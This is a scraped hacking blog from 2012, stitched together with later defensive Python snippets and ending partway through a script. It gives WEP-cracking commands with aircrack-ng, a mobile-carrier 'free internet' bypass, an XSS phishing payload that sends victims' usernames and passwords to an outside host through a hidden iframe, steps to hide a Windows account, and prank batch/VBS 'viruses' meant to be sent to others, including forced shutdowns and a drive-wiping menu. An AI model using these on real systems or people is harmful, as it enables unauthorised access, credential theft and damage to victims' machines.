2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.<br />
<br />
3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).<br />
<br />
4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.<br />
<br />
5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:<br />
<br />
<span style="background-color: #eeeeee;">airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]</span><br />
<span style="background-color: #eeeeee;"><br /></span>
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.<br />
<br />
6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:<br />
<br />
<span style="background-color: #eeeeee;">aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]</span><br />
<br />
In the above command we are using the aireplay-ng program. The -1 tells the program the specific attack we wish to use, which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapter's MAC address, -e is the name (essid) of the target access point, and the command ends with your wireless adapter's device name.<br />
<br />
7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:<br />
<br />
<span style="background-color: #eeeeee;">aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]</span><br />
<br />
In this command, the -3 tells the program the specific type of attack, which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapter's MAC address, and the wireless adapter device name goes at the end.<br />
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:<br />
<br />
<span style="background-color: #eeeeee;">aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs</span><br />
<br />
In this command, the -a 1 forces the program into the WEP attack mode, the -b is the target's MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n, then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger the chance you have of cracking the WEP key.</div>
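The packet injection in step 7 is an ARP request replay: one captured encrypted frame is retransmitted over and over, so the same WEP IV and frame length repeat at a high rate from a single station. The following detection logic is an added example, not part of the original post; the record layout, addresses and thresholds are assumptions, and the sample capture is constructed.

```python
from collections import defaultdict, deque

# Constructed identifiers for the sample (locally administered MAC addresses).
BSSID = "02:00:00:00:00:01"
CLIENT = "02:00:00:00:00:10"
INJECTOR = "02:00:00:00:00:99"


def build_sample():
    """Constructed capture records: (timestamp_s, source_mac, bssid, wep_iv_hex, frame_len).

    The tuple layout is a hypothetical export from a wireless sensor, not the
    output format of any particular tool.
    """
    frames = []
    # Legitimate client: about 20 frames per second, IV changes on every frame.
    for i in range(40):
        frames.append((i * 0.05, CLIENT, BSSID, f"{0x1000 + i:06x}", 120 + (i % 7)))
    # Replayed ARP request: identical IV and length, about 500 frames per second.
    for i in range(300):
        frames.append((0.5 + i * 0.002, INJECTOR, BSSID, "a1b2c3", 68))
    return sorted(frames)


def detect_arp_replay(frames, window=1.0, threshold=100):
    """Flag stations that send the same (IV, length) frame many times in a short window.

    A station encrypting fresh traffic picks a new IV per frame, so a single IV
    seen `threshold` times within `window` seconds from one source is a strong
    replay indicator. Returns {(source_mac, bssid): details}.
    """
    recent = defaultdict(deque)  # (src, bssid, iv, length) -> timestamps inside the window
    alerts = {}
    for ts, src, bssid, iv, length in sorted(frames):
        seen = recent[(src, bssid, iv, length)]
        seen.append(ts)
        # Drop timestamps that have fallen out of the sliding window.
        while seen and ts - seen[0] > window:
            seen.popleft()
        if len(seen) >= threshold and (src, bssid) not in alerts:
            alerts[(src, bssid)] = {
                "iv": iv,
                "frame_len": length,
                "first_seen": seen[0],
                "count_in_window": len(seen),
            }
    return alerts


if __name__ == "__main__":
    for (src, bssid), info in detect_arp_replay(build_sample()).items():
        print(f"possible ARP replay against {bssid} from {src}: {info}")
```

Networks still running WEP should be moved to WPA2 or WPA3; the detection only shortens the time an injection run goes unnoticed.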
<b>Free internet airtel hack for torrent files</b> (Varun Gupta, published 2012-09-03, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Just follow these steps,<br />
<br />
1. Download the <a href="http://www.mediafire.com/?v9li5uh0vg2pbsv">App mobtorrent 1.1 Handler ui</a> . <br />
<br />
<br />
2. Make new Settings In the Phone as Below<br />
<br />
APN: airtelgprs.com<br />
Proxy: 67.117.201.129<br />
Port: 80<br />
<br />
3. Install the app and insert the following settings in Handler menu.<br />
Front query: fb.me/cgi-bin/nph-proxy.cgi/000000A/http/<br />
Proxy type: Real Host<br />
Proxy server: 122.170.122.191<br />
<br />
4. Now Save the settings and Enjoy downloading the Files.</div>
<b>Free internet on pc using airtel gprs</b> (Varun Gupta, published 2012-09-03, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
For this you need to Download a Software Called<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi68RIcyL-Z-mIQAYyAweoOoanBX5BemeVyW5qLD4rVWjHj6RZ6dHEozWMe_mwLS-ba2glK5GB5SJGhihpY71iaP7nGhpxeFmER80aul8oO6wwg7EJ8bBuc9ZXc5Kd8ql9RH0MrRN4nbuU/s1600/CPROXY.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi68RIcyL-Z-mIQAYyAweoOoanBX5BemeVyW5qLD4rVWjHj6RZ6dHEozWMe_mwLS-ba2glK5GB5SJGhihpY71iaP7nGhpxeFmER80aul8oO6wwg7EJ8bBuc9ZXc5Kd8ql9RH0MrRN4nbuU/s320/CPROXY.png" width="320" /></a></div>
<br />
You Can Download It From here <br />
<br />
Now you need to register on Cproxy From here <br />
<br />
Just fill in your registration data as shown and choose your server as Prague-CZ,UDP:9201<br />
<br />
Now restart your software.<br />
Now connect your PC using airtelgprs.com and start Cproxy. Wait till it gets connected and now you are free to browse and download.<br />
<br />
IDM ( Internet Download Manager) Configuration:<br />
<br />
Go to proxy / socks<br />
Tick on proxy<br />
Fill As:<br />
Proxy server address: 127.0.0.1<br />
Port: 3128<br />
Mark http , https , ftp.<br />
<br />
Now You Are Free to download Using IDM.</div>
<b>BackTrack applications for data collection TheHarvester</b> (Varun Gupta, published 2012-09-01, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
TheHarvester is a tool to collect e-mail accounts, user names and host names or subdomains from different public sources such as search engines and PGP key servers.<br />
<br />
This tool is intended to help penetration testers in the early stages of a project. It is very simple, but very effective.<br />
<br />
Supported sources are:<br />
<br />
<ul style="text-align: left;">
<li>Google - emails, subdomains or hostnames</li>
<li>Google Profiles - the names of the employees</li>
<li>Bing - emails, subdomains or hostnames, virtual servers</li>
<li>PGP key servers - emails, subdomains or hostnames</li>
<li>Linkedin - The names of the employees</li>
<li>Exalead - emails, hostnames or subdomain</li>
</ul>
<br />
<br />
New features:<br />
<br />
<ul style="text-align: left;">
<li>The delays between requests</li>
<li>Results XML and HTML export</li>
<li>Search a domain in all sources</li>
<li>Virtual host checker</li>
<li>Shodan computer database integration</li>
<li>Active enumeration (DNS enumeration, reverse DNS lookups, DNS TLD expansion)</li>
<li>Chart statistics</li>
</ul>
<br />
<br />
<div class="separator" style="background-color: white; clear: both; color: #555555; font-family: Cousine; font-size: 13px; line-height: 18px; text-align: center;">
<a href="http://i48.tinypic.com/25qsnmb.png" imageanchor="1" style="color: #c95f5f; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"><br class="Apple-interchange-newline" /><img border="0" src="http://i48.tinypic.com/25qsnmb.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; padding: 0px; position: relative;" /></a></div>
<div style="background-color: white; color: #555555; font-family: Cousine; font-size: 13px; line-height: 18px;">
</div>
<br />
<span style="background-color: #eeeeee;">cd /pentest/enumeration/theharvester</span><br />
<span style="background-color: #eeeeee;">/pentest/enumeration/theharvester# ./theHarvester.py</span><br />
<span style="background-color: #eeeeee;">/pentest/enumeration/theharvester# ./theHarvester.py -d nasa.gov -l 500 -b google</span><br />
<br />
<div class="separator" style="background-color: white; clear: both; color: #555555; font-family: Cousine; font-size: 13px; line-height: 18px; text-align: center;">
<a href="http://i49.tinypic.com/716aud.png" imageanchor="1" style="color: #c95f5f; margin-left: 1em; margin-right: 1em; outline: none; text-decoration: none;"><img border="0" src="http://i49.tinypic.com/716aud.png" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; padding: 0px; position: relative;" /></a></div>
<br />
<b>Downloads</b><br />
The latest version can always be found in the repository on Google Code: <a href="https://code.google.com/p/theharvester">https://code.google.com/p/theharvester</a></div>
<b>Download Mantra-Web Browser With Hacking Tools</b> (Varun Gupta, published 2012-09-01, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
Mantra is a collection of free and open source tools integrated into a web browser, which can be handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7Q72jeIcCYApkyOAGLVhCk8C1Br5Gptpvp2cBW6j1rRSPkdd2VUoTcnEpXFSw32feuwdMHGFLsMMBcqIsyBy_JRtHgsPExbemkGYp4OFiG71hLgfn0UoZn4QinwNmn_Fxxo8SPyxeVBx/s1600/000.jpg" imageanchor="1" style="background-color: white; border-style: none; color: #9b0505; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 1em; margin-right: 1em; margin-top: 0px; outline: none; padding: 0px; text-align: center; text-decoration: none;"><img border="0" height="143" original="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7Q72jeIcCYApkyOAGLVhCk8C1Br5Gptpvp2cBW6j1rRSPkdd2VUoTcnEpXFSw32feuwdMHGFLsMMBcqIsyBy_JRtHgsPExbemkGYp4OFiG71hLgfn0UoZn4QinwNmn_Fxxo8SPyxeVBx/s320/000.jpg" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjX7Q72jeIcCYApkyOAGLVhCk8C1Br5Gptpvp2cBW6j1rRSPkdd2VUoTcnEpXFSw32feuwdMHGFLsMMBcqIsyBy_JRtHgsPExbemkGYp4OFiG71hLgfn0UoZn4QinwNmn_Fxxo8SPyxeVBx/s320/000.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-color: black; border: none; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; margin: 0px; max-width: 575px; outline: none; padding: 0px; position: relative;" width="320" /></a></div>
<br />
The software is intended to be lightweight, flexible, portable and easy to use, with a nice GUI. It can be carried on memory cards, flash drives, CD / DVDs, etc., runs natively on Linux, Windows and Mac, and can also be installed on your system in minutes. Mantra is absolutely free and takes no time for you to understand. Mantra can be very useful in performing the five phases of attacks including reconnaissance, scanning and enumeration, access, privilege escalation, maintaining access, and covering tracks.<br />
<br />
Apart from that, it also contains a set of tools aimed at web developers and code debuggers, which makes it useful for both offensive and defensive security related tasks. The objectives of the project are to create a browser-based ecosystem for hackers, to draw people's attention to the security potential of a browser-based platform, to provide an easy to use and portable platform to demonstrate common web-based attacks (read: training), and to associate with other security tools / products for a better environment.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidv5Lw2cGNDRm4qVLFzqRSpgNi_kjTyiXJ8wkyLViammf88hW-RCSbhkx4wyYqC5TpCIIfNQQrOcCS_VCiGANaVuJuQwQeG5tsUUwcrUucNu_eepbob7D0RTpoq-JjRUoldnq0VPP87qI/s1600/Mantra-Security-Toolkit_5.jpg" style="background-color: white; border-style: none; color: #9b0505; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-left: 1em; margin-right: 1em; margin-top: 0px; outline: none; padding: 0px; text-align: center; text-decoration: none;"><img border="0" height="210" original="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidv5Lw2cGNDRm4qVLFzqRSpgNi_kjTyiXJ8wkyLViammf88hW-RCSbhkx4wyYqC5TpCIIfNQQrOcCS_VCiGANaVuJuQwQeG5tsUUwcrUucNu_eepbob7D0RTpoq-JjRUoldnq0VPP87qI/s400/Mantra-Security-Toolkit_5.jpg" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidv5Lw2cGNDRm4qVLFzqRSpgNi_kjTyiXJ8wkyLViammf88hW-RCSbhkx4wyYqC5TpCIIfNQQrOcCS_VCiGANaVuJuQwQeG5tsUUwcrUucNu_eepbob7D0RTpoq-JjRUoldnq0VPP87qI/s400/Mantra-Security-Toolkit_5.jpg" style="-webkit-box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; background-color: black; border: none; box-shadow: rgba(0, 0, 0, 0.0976563) 1px 1px 5px; margin: 0px; max-width: 575px; outline: none; padding: 0px; position: relative;" width="400" /></a></div>
<br />
<br />
<b><u>Download</u></b>: <br />
Linux 32-bit - <a href="http://getmantra.googlecode.com/files/Mantra%20Security%20Toolkit%20-%20Gandiva.tar.bz2" target="_blank">Mantra Security Toolkit - Gandiva.tar.bz2</a><br />
Windows - <a href="http://getmantra.googlecode.com/files/OWASP%20Mantra%20Security%20Toolkit%20-%20Gandiva.exe" target="_blank">OWASP Mantra Security Toolkit - Gandiva.exe </a></div>
<b>What is cross site scripting XSS</b> (Varun Gupta, published 2012-08-25, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
XSS is certainly changing the way that phishing attacks are perpetrated.<br />
<br />
This video by Brian Contos, CISSP, from a company named Imperva, is controversial. It takes you through each and every step involved in finding an XSS vulnerability in a webpage and showcases some of the basic steps that you need to know.<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="315" src="http://www.youtube.com/embed/r79ozjCL7DA" width="560"></iframe><br />
<br />
For example, we have a target such as:<br />
http://Thewebsite.com/google/add.php?request=<br />
<br />
Suppose there is a login form and an XSS vulnerability in the <br />
same page. <br />
In order to perpetrate the phishing attack, one needs to inject JavaScript code in the <br />
variable so that the victim’s browser loads a JavaScript file. <br />
From a brief analysis of the HTML that the site generates, I know that:<br />
<br />
• The value that the variable “request” receives is not sanitized at all.<br />
<br />
• The login form is named “login_clientes”<br />
<br />
• The login form has two input fields for user data: “user” and “pass”.<br />
<br />
So I will use the following JavaScript code:<br />
<br />
loginForm = document.forms['login_clientes']; <br />
function parseData() <br />
{ <br />
var username = loginForm.user.value; <br />
var password = loginForm.pass.value; <br />
saveData(username,password); <br />
return true; <br />
} <br />
function saveData(username,password) <br />
{ <br />
var frame=document.createElement('iframe'); <br />
frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" + <br />
password; <br />
frame.style.display='none'; <br />
document.body.appendChild(frame); <br />
} <br />
loginForm.onsubmit = parseData;<br />
<br />
So, if browsing a page like (don’t forget to encode the part of the injection):<br />
http://Thewebsite.com/google/add.php?request=<script language="JavaScript" src="http://yourhost/yourJavaScriptfile.js" type="text/javascript"></script> <br />
A victim will give you his personal data, as long as he clicks the Submit button. <br />
<br />
The ideas that you must have in mind are:<br />
<br />
• If you can make the user's browser load your JavaScript file or code when visiting <br />
some site, you can change that site's behavior.<br />
<br />
• If some site has forms and XSS vulnerabilities, you can try to get the data <br />
the user enters.<br />
<br />
• If the user trusts the site, the user will probably give his personal data <br />
anywhere in that site.<br />
<br />
And if the site has vulnerabilities in some page where it doesn’t have forms, and have <br />
some form(s) in other page(s).</div>
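The root cause above is that the value of “request” is written into the page unescaped. The following added example (not part of the original post) renders the same page both ways and checks the output the way a browser would parse it; the page template, the /login.php action and the policy string are assumptions, while the parameter, form and field names are the ones described above.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote

# Hypothetical template for add.php: reflects "request" next to the login form.
PAGE = """<html><body>
<div id="msg">{request}</div>
<form name="login_clientes" method="post" action="/login.php">
<input name="user"><input name="pass" type="password"><input type="submit">
</form>
</body></html>"""

# Second layer: even if markup slipped through, scripts and frames from other
# hosts are refused and the form cannot be submitted to another origin.
CSP = "default-src 'self'; script-src 'self'; frame-src 'self'; form-action 'self'"

# The injection quoted in the post, URL-encoded as it would arrive in the query string.
PAYLOAD = ('<script language="JavaScript" '
           'src="http://yourhost/yourJavaScriptfile.js" type="text/javascript"></script>')
SAMPLE_QUERY = "request=" + quote(PAYLOAD, safe="")


def get_request_param(query_string):
    """Return the decoded value of the 'request' parameter ('' if absent)."""
    return parse_qs(query_string, keep_blank_values=True).get("request", [""])[0]


def render_vulnerable(query_string):
    """The behaviour described in the post: the value is reflected as-is."""
    return PAGE.format(request=get_request_param(query_string))


def render_hardened(query_string):
    """Escape on output for the HTML context and send a restrictive CSP."""
    body = PAGE.format(request=html.escape(get_request_param(query_string), quote=True))
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": CSP,
    }
    return headers, body


class ScriptFinder(HTMLParser):
    """Collects the src of every <script> element an HTML parser would create."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_srcs.append(dict(attrs).get("src"))


def script_sources(markup):
    finder = ScriptFinder()
    finder.feed(markup)
    finder.close()
    return finder.script_srcs


if __name__ == "__main__":
    print("vulnerable page scripts:", script_sources(render_vulnerable(SAMPLE_QUERY)))
    headers, body = render_hardened(SAMPLE_QUERY)
    print("hardened page scripts:  ", script_sources(body))
    print("policy:", headers["Content-Security-Policy"])
```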
<b>How to create an invisible account in windows XP</b> (Varun Gupta, published 2012-08-23, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
1. Open the Start menu, then click on Run. <br />
2. Type regedit in the Run window. <br />
3. The Windows Registry Editor will open. In the left panel, navigate to:<br />
<br />
<span style="background-color: #eeeeee;">HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList</span><br />
<br />
4. Create a new DWORD, setting its name to the name of the account you wish to hide.<br />
5. Then set its value to 0 to hide it.<br />
6. Enjoy, it's hidden!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhstgtW8by5AaH6yre6doPF8yWpaqbUJa7-r6N7C7apZokHZxjZsNKp04xBTFmcoZUgGdekDRkkdwAs68YgpHDRm2FmFrvF4p5kb61TntLxeWJYszruUYpDlvQwZUWOddB-NqU7lKkFAuk/s1600/safemodecp-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhstgtW8by5AaH6yre6doPF8yWpaqbUJa7-r6N7C7apZokHZxjZsNKp04xBTFmcoZUgGdekDRkkdwAs68YgpHDRm2FmFrvF4p5kb61TntLxeWJYszruUYpDlvQwZUWOddB-NqU7lKkFAuk/s320/safemodecp-b.jpg" width="320" /></a></div>
<br />
<br />
<b>NOTE </b>: This account isn't completely hidden because it is visible to administrators in Local Users and Groups, and the profile is also visible in Documents and Settings.<br />
<br />
<b>How to log in after you have hidden the account:</b><br />
<br />
1. Go to the Welcome screen when you want to log in to this account. <br />
2. Press Ctrl+Alt+Delete twice and it will display the log-on prompt. <br />
3. Type the username and the password and hit Enter.</div>
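Because the account still exists and only the UserList value hides it, an administrator can audit that key against the machine's real accounts. The following is an added example, not part of the original post: it parses text in the layout that `reg query` prints for that key, and the sample output, account names and allowlist are constructed assumptions.

```python
import re

# Constructed sample in the layout `reg query` prints for the UserList key:
# four spaces, value name, four spaces, type, four spaces, data.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    HelpAssistant    REG_DWORD    0x0
    svc backup    REG_DWORD    0x0
    oldadmin    REG_DWORD    0x0
    kiosk    REG_DWORD    0x1
"""

# Constructed inventory of local accounts, e.g. copied from Local Users and Groups.
SAMPLE_LOCAL_ACCOUNTS = ["Administrator", "Guest", "HelpAssistant", "svc backup", "kiosk"]

# Site-specific allowlist of accounts that are expected to be hidden (assumption).
SAMPLE_BASELINE = ["HelpAssistant"]

VALUE_LINE = re.compile(
    r"^ {4}(?P<name>.+?) {4}REG_DWORD {4}(?P<data>0x[0-9a-fA-F]+)\s*$",
    re.MULTILINE,
)


def parse_userlist(reg_text):
    """Return {value_name: dword} for every REG_DWORD line in the query output."""
    return {m["name"]: int(m["data"], 16) for m in VALUE_LINE.finditer(reg_text)}


def audit_hidden_accounts(reg_text, local_accounts, baseline=()):
    """Report accounts hidden from the Welcome screen (value 0) outside the baseline.

    hidden_existing   - a real local account is being hidden: review who created it.
    hidden_no_account - a hide entry with no matching account: stale or staged.
    Account names are compared case-insensitively, as Windows does.
    """
    known = {name.lower() for name in local_accounts}
    allowed = {name.lower() for name in baseline}
    report = {"hidden_existing": [], "hidden_no_account": []}
    for name, value in sorted(parse_userlist(reg_text).items()):
        if value != 0 or name.lower() in allowed:
            continue
        bucket = "hidden_existing" if name.lower() in known else "hidden_no_account"
        report[bucket].append(name)
    return report


def run_sample():
    return audit_hidden_accounts(SAMPLE_REG_OUTPUT, SAMPLE_LOCAL_ACCOUNTS, SAMPLE_BASELINE)


if __name__ == "__main__":
    for bucket, names in run_sample().items():
        print(f"{bucket}: {names}")
```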
<b>Batch file programming commands</b> (Varun Gupta, published 2012-08-22, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjguvle7EXD8Pjtdpix4kTQ7vwnXXoyjfS14-1cIlSH_VU_IJqXnR2taUo6GvN8KN6CDmCFvou1sPlcucu8vKGPF-1UuFRXs37BMYTxcX5mh2hSgXUUTrgrA7ZuCt3Vpta-Bma-vwMvNzk/s1600/batch-file-programming.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjguvle7EXD8Pjtdpix4kTQ7vwnXXoyjfS14-1cIlSH_VU_IJqXnR2taUo6GvN8KN6CDmCFvou1sPlcucu8vKGPF-1UuFRXs37BMYTxcX5mh2hSgXUUTrgrA7ZuCt3Vpta-Bma-vwMvNzk/s320/batch-file-programming.png" width="298" /></a></div><br />
<iframe class="scribd_iframe_embed" data-aspect-ratio="0.772727272727273" data-auto-height="true" frameborder="0" height="800" id="doc_42138" scrolling="no" src="http://www.scribd.com/embeds/20907626/content?start_page=1&view_mode=list&access_key=key-e2dp5kbnz76k6e47cma" width="100%"></iframe></div>
<b>Notepad Virus Codes</b> (Varun Gupta, published 2012-06-23, updated 2012-11-27)<br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<u>Cycle a message in your friend's computer</u>:<br />
<span style="background-color: white;">Open Notepad and type:</span><br />
@ECHO off<br />
:Begin<br />
msg * Hi<br />
msg * Are you having fun?<br />
msg * I am!<br />
msg * Lets have fun together!<br />
msg * Because you have been o-w-n-e-d<br />
GOTO BEGIN<br />
<br />
Save it as Anything.BAT and send it to your friends or enemy.<br />
<br />
<u>Convey your friend a lil' message and shut down his / her computer</u>:<br />
Type :<br />
<br />
@echo off<br />
msg * I don't like you<br />
shutdown -c "Error! You are too stupid!" -s<br />
<br />
Save it as Anything.BAT in All Files and send it.<br />
<br />
<u>Open Notepad continually in your friend's computer</u>:<br />
Type :<br />
<br />
@ECHO off<br />
:top<br />
START %SystemRoot%\system32\notepad.exe<br />
GOTO top<br />
<br />
Save it as Anything.BAT and send it.<br />
<br />
<u>Hack your friend's keyboard and make him type "You are a fool" continuously</u><br />
Type :<br />
<br />
Set wshShell = wscript.CreateObject("WScript.Shell")<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys "You are a fool."<br />
loop<br />
<br />
Save it as Anything.VBS and send it.<br />
<br />
<u>Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!</u><br />
Type :<br />
<br />
Set oWMP = CreateObject("WMPlayer.OCX.7")<br />
Set colCDROMs = oWMP.cdromCollection<br />
do<br />
if colCDROMs.Count >= 1 then<br />
For i = 0 to colCDROMs.Count - 1<br />
colCDROMs.Item(i).Eject<br />
Next<br />
For i = 0 to colCDROMs.Count - 1<br />
colCDROMs.Item(i).Eject<br />
Next<br />
End If<br />
wscript.sleep 5000<br />
loop<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<u>Toggle your friend's Caps Lock button continuously:</u><br />
Type :<br />
<br />
Set wshShell =wscript.CreateObject("WScript.Shell")<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys "{CAPSLOCK}"<br />
loop<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<u>Frustrate your friend by making this VBScript hit Enter continuously</u>:<br />
Type :<br />
<br />
Set wshShell = wscript.CreateObject("WScript.Shell")<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys "~(enter)"<br />
loop<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<u>Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out</u>:<br />
Type :<br />
<br />
WScript.Sleep 180000<br />
WScript.Sleep 10000<br />
Set WshShell = WScript.CreateObject("WScript.Shell")<br />
WshShell.Run "notepad"<br />
WScript.Sleep 100<br />
WshShell.AppActivate "Notepad"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "Hel"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "lo "<br />
WScript.Sleep 500<br />
WshShell.SendKeys ", ho"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "w a"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "re "<br />
WScript.Sleep 500<br />
WshShell.SendKeys "you"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "? "<br />
WScript.Sleep 500<br />
WshShell.SendKeys "I a"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "m g"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "ood"<br />
WScript.Sleep 500<br />
WshShell.SendKeys " th"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "ank"<br />
WScript.Sleep 500<br />
WshShell.SendKeys "s! "<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<u>Frustrate your friend by making this VBScript hit Backspace continuously</u>:<br />
Type :<br />
<br />
MsgBox "Let's go back a few steps"<br />
Set wshShell =wscript.CreateObject("WScript.Shell")<br />
do<br />
wscript.sleep 100<br />
wshshell.sendkeys "{bs}"<br />
loop<br />
<br />
Save it as "Anything.VBS" and send it.<br />
<br />
<span style="background-color: white;"><u>Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action</u>:</span><br />
<br />
1: Shutdown<br />
2: Restart<br />
3: Wipes out your hard drive (BEWARE)<br />
4: Net send<br />
5: Messages then shutdown<br />
Type :<br />
<br />
@echo off<br />
title The end of the world<br />
cd C:\<br />
:menu<br />
cls<br />
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...<br />
pause<br />
echo Pick your poison:<br />
echo 1. Die this way (Wimp)<br />
echo 2. Die this way (WIMP!)<br />
echo 3. DO NOT DIE THIS WAY<br />
echo 4. Die this way (you're boring)<br />
echo 5. Easy way out<br />
set input=nothing<br />
set /p input=Choice:<br />
if %input%==1 goto one<br />
if %input%==2 goto two<br />
<br />
Save it as "Anything.BAT" and send it.<br />
<br />
You might want to change the icon of the file before sending it to your friend, so right click the file, click Properties, click on 'Change Icon' and change the icon from there.<br />
<br />
<u>Threaten by making screen flash</u><br />
<br />
To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.<br />
<br />
@echo off<br />
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg<br />
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg<br />
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg<br />
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg<br />
echo g=100>>\z.dbg<br />
echo q>>\z.dbg<br />
debug <\z.dbg>nul<br />
del \z.dbg<br />
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.<br />
@echo off<br />
:a<br />
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg<br />
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg<br />
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg<br />
